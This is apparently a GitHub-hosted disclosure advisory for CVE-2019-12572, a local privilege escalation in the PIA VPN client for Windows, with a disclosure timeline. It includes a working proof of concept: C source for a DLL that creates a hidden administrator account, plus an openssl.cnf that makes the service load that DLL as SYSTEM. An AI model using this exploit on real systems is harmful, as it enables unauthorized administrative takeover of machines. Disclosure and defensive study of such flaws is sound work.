Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
117 lines (78 sloc) 2.88 KB
Title: PIA Windows Privilege Escalation: Malicious OpenSSL engine
Author: Rich Mirch
CVE: CVE-2019-12572
Vendor Advisory: N/A
Blog Post: https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client 1.0.2 (build 02363) for Windows could allow an authenticated, local
attacker to run arbitrary code with elevated privileges.
On startup the PIA Windows service(pia-service.exe) loads the OpenSSL library from
C:\Program Files\Private Internet Access\libeay32.dll. This library attempts
to load the c:\etc\ssl\openssl.cnf configuration file which does not exist. By
default on Windows systems, authenticated users can create directories under c:\.
A low privileged user can create an openssl.cnf configuration file to load a
malicious OpenSSL engine library resulting in the arbitrary code execution as
SYSTEM when the service starts.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C
Base: 7.8
Temporal: 7.8
Test Environment
OS: Windows 10 Pro 10.0.17763
PIA Version: 1.0.2 (build 02363)
Steps to reproduce
Note: All steps are executed using a low privileged account.
1) Create the c:\etc\ssl directory
mkdir c:\etc\ssl
2) Create a malicious engine library named woot.dll to create an administrator
account named woot when loaded.
/* Cross Compile with
x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
system("cmd /c net user woot insertpasswordhere /add");
system("cmd /c net localgroup administrators woot /add");
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}
3) Copy the malicious woot.dll file into the c:\etc\ssl folder.
copy woot.dll c:\etc\ssl
4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0
5) Reboot the system because a low privilege user does not have permission to
restart the service.
6) After the reboot has completed, login and open a command shell. At this point
the "woot" administrator account will exist.
net user woot
Timeline:
2019-02-16: Reported to vendor
2019-02-16: Vendor confirmed vulnerability
2019-06-04: Vendor released fix in v1.2.1
2019-06-10: Public disclosure
You can’t perform that action at this time.